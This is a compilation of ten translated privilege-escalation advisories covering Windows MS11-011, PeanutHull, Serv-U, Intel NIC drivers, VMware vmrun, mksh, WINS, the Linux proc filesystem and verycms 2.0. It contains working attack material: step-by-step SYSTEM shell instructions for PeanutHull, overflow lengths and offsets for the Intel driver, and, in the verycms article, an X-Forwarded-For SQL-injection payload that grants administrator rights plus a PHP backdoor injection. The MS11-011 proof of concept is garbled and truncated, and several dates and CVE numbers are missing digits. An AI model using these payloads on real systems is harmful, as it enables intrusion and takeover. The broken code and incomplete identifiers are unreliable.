
Microsoft Windows Kernel Integer Truncation Local Privilege Escalation Vulnerability and Fix

2023-06-12 08:23:00

Contributor “天岳98714” collected and submitted to this site 10 articles on the Microsoft Windows Kernel integer truncation local privilege escalation vulnerability and its fix; the collection follows.

Article 1: Microsoft Windows Kernel integer truncation local privilege escalation vulnerability and fix

Affected versions:

Microsoft Windows XP Tablet PC Edition SP3

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows XP Tablet PC Edition

Microsoft Windows XP Service Pack 3 0

Microsoft Windows XP Professional SP3

Microsoft Windows XP Professional SP2

Microsoft Windows XP Professional SP1

Microsoft Windows XP Professional

Microsoft Windows XP Media Center Edition SP3

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows XP Media Center Edition

Microsoft Windows XP Home SP3

Microsoft Windows XP Home SP2

Microsoft Windows XP Home SP1

Microsoft Windows XP Home

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows XP 64-bit Edition

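Vulnerability description:

Windows is a very popular operating system released by Microsoft.

The Windows Kernel has a local privilege escalation vulnerability in its implementation. An attacker can exploit it to execute arbitrary code with kernel-level privileges and so take complete control of the affected computer.

The vulnerability stems from the Kernel's support for trace events. Because of a malformed conversion, the Kernel uses a truncated length when it allocates a buffer for data from user space. When it fills that buffer, the Kernel uses a different length, which overflows the buffer. This corrupts memory and leads to arbitrary code execution.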
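The length mismatch described above, modelled in user-space C as an added example (it is not code from the advisory, the PoC or Windows). The 16-bit width, the header size and all function names are assumptions chosen for illustration; the hardened function validates the length once and uses that single value for both the allocation and the copy.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical user-space model of the bug class. Every name here and the
 * 16-bit width are assumptions for illustration, not taken from Windows. */
#define MSG_HEADER_SIZE 48u /* constructed header size */

enum msg_status { MSG_OK = 0, MSG_TOO_LARGE = -1, MSG_NO_MEMORY = -2 };

/* Flawed sizing: the 32-bit total is narrowed to 16 bits before allocating. */
uint16_t flawed_alloc_size(uint32_t payload_len)
{
    return (uint16_t)(MSG_HEADER_SIZE + payload_len);
}

/* Bytes the flawed path would write past its allocation, because the fill
 * step uses the full length while the allocation used the narrowed one. */
uint64_t flawed_overflow_bytes(uint32_t payload_len)
{
    uint64_t written = (uint64_t)MSG_HEADER_SIZE + payload_len;
    uint64_t allocated = flawed_alloc_size(payload_len);
    return written > allocated ? written - allocated : 0;
}

/* Hardened form: reject any length that does not fit the narrow type, then
 * allocate and copy with the same validated value. */
enum msg_status build_message(const uint8_t *payload, uint32_t payload_len,
                              uint8_t **out, uint16_t *out_len)
{
    uint16_t total;
    uint8_t *buf;

    if (payload_len > UINT16_MAX - MSG_HEADER_SIZE)
        return MSG_TOO_LARGE;               /* would not survive the cast */
    total = (uint16_t)(MSG_HEADER_SIZE + payload_len);
    buf = malloc(total);
    if (buf == NULL)
        return MSG_NO_MEMORY;
    memset(buf, 0, MSG_HEADER_SIZE);
    if (payload_len != 0)                   /* copy length derived from total */
        memcpy(buf + MSG_HEADER_SIZE, payload, total - MSG_HEADER_SIZE);
    *out = buf;
    *out_len = total;
    return MSG_OK;
}

int main(void)
{
    /* Constructed lengths around the 16-bit boundary. */
    const uint32_t lens[] = { 100u, 0xFFCFu, 0xFFD0u, 0x10000u };
    size_t i;

    for (i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        uint8_t *msg = NULL;
        uint16_t msg_len = 0;
        uint8_t *payload = calloc(1, lens[i]);
        enum msg_status st;

        if (payload == NULL)
            return 1;
        st = build_message(payload, lens[i], &msg, &msg_len);
        printf("payload=%lu flawed_alloc=%u overflow=%llu hardened=%d\n",
               (unsigned long)lens[i], (unsigned)flawed_alloc_size(lens[i]),
               (unsigned long long)flawed_overflow_bytes(lens[i]), (int)st);
        free(msg);
        free(payload);
    }
    return 0;
}
```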

<*Reference

www.zerodayinitiative.com/advisories/ZDI-11-064/

*>

std_logic provided the following test method:

/*
# Exploit Title: MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC
# Date: 2011-03-01
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link:
# Version: prior to MS11-011
# Tested on: Win XP SP3
# CVE : CVE-2011-0045
# Status : Patched
# Binary Analysis: cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
*/

#include
#include
#include
#include
#include
#include

#define WmiTraceMessageCode 40
#define WmiCreateUMLogger 84
#define WmiStartLoggerCode 32

#define IOCTL_WMI_TRACE_MESSAGE \
    CTL_CODE(FILE_DEVICE_UNKNOWN, WmiTraceMessageCode, \
             METHOD_NEITHER, FILE_WRITE_ACCESS)

/*
#define CTL_CODE( DeviceType, Function, Method, Access ) ( \
    ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \
)

#define IOCTL_WMI_TRACE_MESSAGE \
    CTL_CODE(FILE_DEVICE_UNKNOWN, WmiTraceMessageCode, \
             METHOD_NEITHER, FILE_WRITE_ACCESS)

#define IOCTL_WMI_CREATE_UM_LOGGER CTL_CODE(FILE_DEVICE_UNKNOWN, \
    WmiCreateUMLogger, METHOD_BUFFERED, FILE_READ_ACCESS)

#define IOCTL_WMI_START_LOGGER \
    CTL_CODE(FILE_DEVICE_UNKNOWN, WmiStartLoggerCode, \
             METHOD_BUFFERED, FILE_ANY_ACCESS)

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef UNICODE_STRING *PUNICODE_STRING;

typedef struct _STRING64 {
    USHORT Length;
    USHORT MaximumLength;
    ULONGLONG Buffer;
} STRING64;

typedef STRING64 *PSTRING64;
typedef STRING64 UNICODE_STRING64;
typedef UNICODE_STRING64 *PUNICODE_STRING64;

//
// WNODE definition
typedef struct _WNODE_HEADER
{
    ULONG BufferSize;            // Size of entire buffer inclusive of this
    ULONG
    ULONG ProviderId;            // Provider Id of driver returning this buffer
    union
    {
        ULONG64 HistoricalContext; // Logger use
        struct
        {
            ULONG Version;       // Reserved
            ULONG Linkage;       // Linkage field reserved for WMI
        };
    };
    union
    {
        ULONG CountLost;         // Reserved
        HANDLE KernelHandle;     // Kernel handle for data block
        LARGE_INTEGER TimeStamp; // Timestamp as returned in units of 100ns
                                 // since 1/1/1601
    };
    GUID Guid;                   // Guid for data block returned with results
    ULONG ClientContext;
    ULONG Flags;                 // Flags, see below
} WNODE_HEADER, *PWNODE_HEADER;

//
// Logger configuration and running statistics. This structure is used
// by WMI.DLL to convert to UNICODE_STRING
//
// begin_wmikm
typedef struct _WMI_LOGGER_INFORMATION {
    WNODE_HEADER Wnode;          // Had to do this since wmium.h comes later
    //
    // data provider by caller
    ULONG BufferSize;            // buffer size for logging (in kbytes)
    ULONG MinimumBuffers;        // minimum to preallocate
    ULONG MaximumBuffers;        // maximum buffers allowed
    ULONG MaximumFileSize;       // maximum logfile size (in MBytes)
    ULONG LogFileMode;           // sequential, circular
    ULONG FlushTimer;            // buffer flush timer, in seconds
    ULONG EnableFlags;           // trace enable flags
    LONG AgeLimit;               // aging decay time, in minutes
    ULONG Wow;                   // TRUE if the logger started under WOW64
    union {
        HANDLE LogFileHandle;    // handle to logfile

&

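Article 2: PeanutHull (花生壳) local privilege escalation vulnerability

PeanutHull local privilege escalation vulnerability

by Sowhat

Last updated: .09.24

English: secway.org/advisory/AD20050720EN.txt

Chinese: secway.org/advisory/AD20050720CN.txt

CVE: CAN-2005-2382

BID: 14330

Affected products: PeanutHull <= 3.0.1.0

Overview: 网域科技 claims to be the world's largest DDNS (dynamic domain name) provider, and PeanutHull (花生壳) is the client it provides. For details, see www.oray.net

Details: The vulnerability is mainly caused by the PeanutHull client's system tray icon failing to drop SYSTEM privileges correctly. A local unprivileged user can execute arbitrary commands with SYSTEM privileges by accessing the tray icon.

Exploit:

1. Double-click the PeanutHull icon in the taskbar to open the PeanutHull window

2. Click "Help", then open "Forum"

3. In the address bar of the IE window that pops up, enter C:\

4. Navigate to %WINDIR%\System32\

5. Click to open cmd.exe

6. The cmd.exe opened this way runs with SYSTEM privileges

Successful exploitation of this vulnerability yields SYSTEM privileges.

Vendor response:

2005.07.13 Vendor notified by e-mail.

2005.07.14 Vendor replied that the issue would be fixed in the 3.0 final release.

2005.07.20 PeanutHull 3.0 final release published.

2005.07.20 This advisory published.

Update: While verifying this vulnerability, Secunia found that the latest version, 3.0.1.0, still has the flaw. A local user can bring up the PeanutHull window by sending a SW_SHOW message and then escalate privileges.

2005.07.21 Test code published.

Exploit: secway.org/exploit/PeanutHull_Local.rar

Solution: None yet. PeanutHull users should restrict access by ordinary users and keep watching for patches from 网域科技.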

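Article 3: Serv-U local privilege escalation vulnerability

Affected systems:

RhinoSoft Serv-U 5.1.0.0

RhinoSoft Serv-U 5.0.0.9

RhinoSoft Serv-U 5.0.0.4

RhinoSoft Serv-U 5.0

RhinoSoft Serv-U 4.1.0.3

RhinoSoft Serv-U 4.1.0.11

RhinoSoft Serv-U 4.0.0.4

RhinoSoft Serv-U 4.0.0.0

RhinoSoft Serv-U 3.0.0.20

Description:

--------------------------------------------------------------------------------

Serv-U is a very widely used FTP server for the Windows platform.

Serv-U has a design flaw that a local attacker can exploit to execute arbitrary commands on the system with SYSTEM privileges.

Every Serv-U installation has a default local administrator login password. This account can only connect over the local interface, so a local attacker can connect to Serv-U and create an FTP user that has execute permission. Once that user exists, the attacker connects to the FTP server and issues the "SITE EXEC" command, and the program is run with SYSTEM privileges.

Link: marc.theaimsgroup.com/?l=full-disclosure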

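Article 4: Analysis of the PeanutHull (花生壳) local privilege escalation vulnerability

Affected products:

PeanutHull <= 3.0.1.0

Overview:

网域科技 claims to be the world's largest DDNS (dynamic domain name) provider.

PeanutHull (花生壳) is the client it provides.

For details, see www.oray.net

Details:

The vulnerability is mainly caused by the PeanutHull client's system tray icon failing to drop SYSTEM privileges correctly.

A local unprivileged user can execute arbitrary commands with SYSTEM privileges by accessing the tray icon.

Exploit:

1. Double-click the PeanutHull icon in the taskbar to open the PeanutHull window

2. Click "Help", then open "Forum"

3. In the address bar of the IE window that pops up, enter C:\

4. Navigate to %WINDIR%\System32\

5. Click to open cmd.exe

6. The cmd.exe opened this way runs with SYSTEM privileges

Successful exploitation of this vulnerability yields SYSTEM privileges.

Vendor response:

2005.07.13 Vendor notified by e-mail.

2005.07.14 Vendor replied that the issue would be fixed in the 3.0 final release.

2005.07.20 PeanutHull 3.0 final release published.

2005.07.20 This advisory published.

Update:

While verifying this vulnerability, Secunia found that the latest version, 3.0.1.0, still has the flaw.

A local user can bring up the PeanutHull window by sending a SW_SHOW message and then escalate privileges.

2005.07.21 Test code published.

Exploit:

secway.org/exploit/PeanutHull_Local.rar

Or see the attachment.

Solution:

None yet.

Keep watching for patches from 网域科技.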

PeanutHull_Local.rar

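Article 5: Intel network adapter driver local privilege escalation vulnerability

Affected systems:

Intel PRO 10/100 for Windows <= 8.0.27.0

Intel PRO 10/100 for UnixWare/SCO6 <= 4.0.3

Intel PRO 10/100 for Linux <= 3.5.14

Intel PRO/1000 for Windows <= 8.7.1.0

Intel PRO/1000 for UnixWare/SCO6 <= 9.0.15

Intel PRO/1000 for Linux <= 7.2.7

Intel PRO/1000 PCIe <= 9.1.30.0

Intel PRO/10GbE <= 1.0.109

Unaffected systems:

Intel PRO 10/100 for Windows 8.0.43.0

Intel PRO 10/100 for UnixWare/SCO6 4.0.4

Intel PRO 10/100 for Linux 3.5.17

Intel PRO/1000 for Windows 8.7.9.0

Intel PRO/1000 for UnixWare/SCO6 9.2.6

Intel PRO/1000 for Linux 7.3.15

Intel PRO/1000 PCIe 9.6.31.0

Intel PRO/10GbE 1.0.119

Description:

BUGTRAQ  ID: 21456

Intel Pro 100/1000 is a family of network adapters from Intel.

All Intel network adapter drivers (NDIS miniport drivers) contain a stack overflow vulnerability that a local attacker may exploit to elevate privileges on the system.

Although an NDIS miniport driver sits at a low layer, unprivileged user-mode code can still communicate with it through the adapter statistics requests that NDIS is required to implement. If an attacker can send an IOCTL_NDIS_QUERY_SELECTED_STATS (0x17000E) request to \Device\{adapterguid}, NDIS.SYS calls the QueryInformationHandler routine that the miniport driver registered when it called NdisMRegisterMiniport.

The input buffer supplied with this IOCTL is a list of 32-bit statistics OIDs. Each one is passed separately to QueryInformationHandler, which contains the code needed to retrieve the statistic and return it in the output buffer.

In the Intel miniport driver, some OID handlers process the contents of the output buffer. Under Windows , the pointer to the user-supplied buffer is passed directly to the miniport driver, which means the data is user-controlled. Under Windows XP and later, the pointer passed is to a temporary buffer in kernel memory that contains undefined data, so pool memory has to be controlled before the attack in order to control that data.

The handler for OID 0xFF0203FC uses the following strcpy operation to copy a string from the output buffer into a stack variable:

strcpy(&(var_1D4.sz_62), (char*)InformationBuffer + 4)

By supplying a string of 0x17A characters, an attacker can therefore make the handler completely overwrite the function's return address and redirect execution to an arbitrary user-mode or kernel-mode address. The attack string must sit at offset +0x0C of the output buffer, because NDIS itself uses the first 8 bytes.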
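The unbounded copy described above next to a bounded form, as an added example in portable C (it is not Intel's driver code and not taken from the eEye advisory). The field size FIELD_LEN and all function names are assumptions; the hardened handler only accepts a string that is terminated inside the declared buffer length and that fits the destination field.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical model of a string-carrying OID handler; not Intel's code.
 * FIELD_LEN is an assumed size, the advisory does not state the real one. */
#define STRING_OFFSET 4u  /* the page's handler reads at InformationBuffer + 4 */
#define FIELD_LEN     64u

enum oid_status { OID_OK = 0, OID_BAD_LENGTH, OID_BAD_DATA };

struct handler_locals {
    uint32_t flags;
    char     name[FIELD_LEN];
};

/* Unsafe pattern from the advisory, kept for contrast and never called here:
 * strcpy trusts the buffer to hold a terminated string that fits the field. */
void unsafe_fill(struct handler_locals *l, const void *info_buf)
{
    strcpy(l->name, (const char *)info_buf + STRING_OFFSET);
}

/* Hardened pattern: the declared buffer length bounds every read, and the
 * destination size bounds the write. */
enum oid_status safe_fill(struct handler_locals *l, const void *info_buf,
                          size_t info_len)
{
    const char *src, *nul;
    size_t avail, n;

    if (l == NULL || info_buf == NULL || info_len <= STRING_OFFSET)
        return OID_BAD_LENGTH;
    src = (const char *)info_buf + STRING_OFFSET;
    avail = info_len - STRING_OFFSET;
    nul = memchr(src, '\0', avail);      /* never scan past the buffer */
    if (nul == NULL)
        return OID_BAD_DATA;             /* unterminated or undefined data */
    n = (size_t)(nul - src);
    if (n >= sizeof l->name)
        return OID_BAD_LENGTH;           /* string does not fit the field */
    memcpy(l->name, src, n + 1);         /* includes the terminator */
    return OID_OK;
}

/* Builds a constructed request (4 header bytes, `count` 'A' characters and an
 * optional terminator) and returns what the hardened handler decides. */
enum oid_status check_case(size_t count, int terminate)
{
    uint8_t req[512];
    struct handler_locals locals;
    size_t len = STRING_OFFSET + count + (terminate ? 1u : 0u);

    if (len > sizeof req)
        return OID_BAD_LENGTH;
    memset(req, 0, STRING_OFFSET);
    memset(req + STRING_OFFSET, 'A', count);
    if (terminate)
        req[STRING_OFFSET + count] = '\0';
    memset(&locals, 0, sizeof locals);
    return safe_fill(&locals, req, len);
}

int main(void)
{
    printf("10 chars, terminated:    %d\n", (int)check_case(10, 1));
    printf("63 chars, terminated:    %d\n", (int)check_case(63, 1));
    printf("64 chars, terminated:    %d\n", (int)check_case(64, 1));
    printf("0x17A chars, terminated: %d\n", (int)check_case(0x17A, 1));
    printf("10 chars, unterminated:  %d\n", (int)check_case(10, 0));
    return 0;
}
```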

<*Source: Derek Soeder (dsoeder@eeye.com)

Links: www.intel.com/support/network/sb/CS-023726.htm

research.eeye.com/html/advisories/published/AD1207.html

*>

Recommendation:

Vendor patch:

Intel

-----

The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:

support.intel.com/support/network/sb/cs-006103.htm

support.intel.com/support/network/sb/cs-006120.htm

support.intel.com/support/network/adapter/pro100/sb/cs-008402.htm

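Article 6: VMware vmrun local privilege escalation vulnerability on Linux and its fix

Affected versions:

VMWare Workstation 7.x

VMWare Workstation 6.x

Vulnerability description:

The VMware VIX API helps you write software and scripts that automate virtual machine operations, run programs, or manage files in guest operating systems. VMware Workstation is a powerful desktop virtualization product that lets users run different operating systems at the same time on a single desktop and offers the best solution for developing, testing and deploying new applications.

VMware "vmrun" on Linux has a local privilege escalation vulnerability in its implementation that an attacker can exploit to escalate privileges.

The vulnerability arises because the vmrun program incorrectly loads libraries from certain directories. An attacker who gets the program to load a malicious shared library can execute arbitrary code with the privileges of the user currently running vmrun.

<*Reference

Tim Brown (securityfocus@machine.org.uk)

marc.info/?l=full-disclosure&m=130146421004752&w=2

*>

Vendor patch:

VMWare

------

The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:

www.vmware.com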

Article 7: MirOS BSD Korn Shell local privilege escalation vulnerability

Affected systems:

MirOS Project MirBSD Korn Shell < R33d

Unaffected systems:

MirOS Project MirBSD Korn Shell R33d

Description:

--------------------------------------------------------------------------------

BUGTRAQ ID: 28768

MirOS BSD is a BSD-family operating system that runs on 32-bit i386 and sparc platforms.

MirBSD's Korn Shell (mksh) has an error when it attaches to a TTY through the -T command-line switch. A local attacker can use characters previously written to the attached virtual console to execute arbitrary commands with the privileges of the user running mksh.

<*Source: MirOS Project

Links: secunia.com/advisories/29803/

www.mirbsd.org/mksh.htm#clog

*>

Recommendation:

--------------------------------------------------------------------------------

Vendor patch:

MirOS Project

-------------

The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:

www.mirbsd.org

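Article 8: Microsoft Windows WINS service local privilege escalation vulnerability

Source: IT Lab

Microsoft Windows is a very popular operating system released by Microsoft. The WINS service in Windows does not sufficiently validate data structures inside specially crafted WINS network packets, which may allow a local attacker to run code with elevated privileges.

Published: -06-10

Updated: 2008-06-12

Affected systems:

Microsoft Windows Server SP2

Microsoft Windows Server 2003 SP1

Microsoft Windows SP4

Description:

----------------------------------------------------------------------------

BUGTRAQ ID: 29588

CVE(CAN) ID: CVE-2008-1451

Microsoft Windows is a very popular operating system released by Microsoft.

The WINS service in Windows does not sufficiently validate data structures inside specially crafted WINS network packets, which may allow a local attacker to run code with elevated privileges.

An attacker who successfully exploits this vulnerability can take complete control of the affected system. The attacker could then install programs; view, change, or delete data; or create new accounts.

<*Source: Microsoft

Links: secunia.com/advisories/30584/

www.microsoft.com/technetsecurity.chinaitlab.com/bulletin/MS08-034.mspx?pf=true

www.us-cert.gov/cas/techalerts/TA08-162B.html

*>

Recommendation:

----------------------------------------------------------------------------

Vendor patch:

Microsoft

---------

Microsoft has released a security bulletin (MS08-034) and a corresponding patch for this issue:

MS08-034:Vulnerability in WINS Could Allow Elevation of Privilege (948745)

Link: www.microsoft.com/technetsecurity.chinaitlab.com/bulletin/MS08-034.mspx?pf=true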

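Article 9: Linux Kernel PROC file system local privilege escalation vulnerability

Affected systems:

Linux kernel < 2.6.17.5

Unaffected systems:

Linux kernel 2.6.17.5

Description:

BUGTRAQ  ID: 18992

CVE(CAN) ID: CVE--3626

The Linux Kernel is the kernel used by the open-source operating system Linux.

A race condition exists in the proc file system of the Linux Kernel. A local attacker may exploit it to gain root privileges.

This is a 0day attack and is currently being actively exploited.

<*Source: h00lyshit (h00lyshit@yahoo.ie)

Links: marc.theaimsgroup.com/?l=full-disclosure&m=115290935923500&w=2

www.debian.org/security//dsa-1111

*>

Recommendation:

Vendor patch:

Debian

------

Debian has released a security advisory (DSA-1111-1) and corresponding patches for this issue:

DSA-1111-1:New Linux kernel 2.6.8 packages fix privilege escalation

Link: www.debian.org/security/2005/dsa-1111

Patch downloads: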


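Patch installation:

1. Install the patch package manually:

First, download the patch with the following command:

# wget url  (url is the patch download link)

Then install the patch with the following command:

# dpkg -i file.deb (file is the name of the corresponding patch)

2. Install the patch package automatically with apt-get:

First, update the internal database with the following command:

# apt-get update

Then install the updated packages with the following command:

# apt-get upgrade

Linux

-----

The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:

www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.17.5.tar.bz2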

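Article 10: verycms2.0 privilege escalation vulnerability

code:

passport_client.php

function Loginipwrite($winduid){
    global $db,$timestamp,$onlineip;
    // $onlineip is interpolated into the SQL string without escaping
    $logininfo="$onlineip|$timestamp|6";
    $db->update(
        "UPDATE pw_user SET lastvisit=thisvisit,thisvisit='$timestamp',onlineip='$logininfo' WHERE uid='$winduid'");
}

Now look at where $onlineip comes from.

Global.php

// The first two sources are request headers set by the client
if($_SERVER['HTTP_CLIENT_IP']){
    $onlineip=$_SERVER['HTTP_CLIENT_IP'];
}elseif($_SERVER['HTTP_X_FORWARDED_FOR']){
    $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
    $onlineip=$_SERVER['REMOTE_ADDR'];
}
$onlineip =substrs($onlineip,16);

Both headers are set by the client, and the value is only shortened to 16 bytes, not validated or escaped, before it reaches the UPDATE statement.

Sixteen bytes; enough to escalate privileges, right?

Capture the request and submit:

HTTP_X_FORWARDED_FOR: ',groupid=3,/*

Haha, now everyone has become an administrator.

There is one more, very marginal issue: if short_open_tag = off in php.ini, a shell can be obtained.

Look at this piece of code in register.php:

if($rg_allowsameip){
    if(file_exists(D_P.'data/cache/ip_cache.php')){
        // the client-supplied value is appended to a .php cache file
        writeover(D_P.'data/cache/ip_cache.php',"<$onlineip>","ab");
    }else{
        writeover(D_P.'data/cache/ip_cache.php',"<$onlineip>");
    }
}

When registering, we capture the request and submit HTTP_X_FORWARDED_FOR as ?require($a);?

data/cache/ip_cache.php then takes this form:

……

If short_open_tag = off in php.ini, the die() can be bypassed, so our backdoor gets executed.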
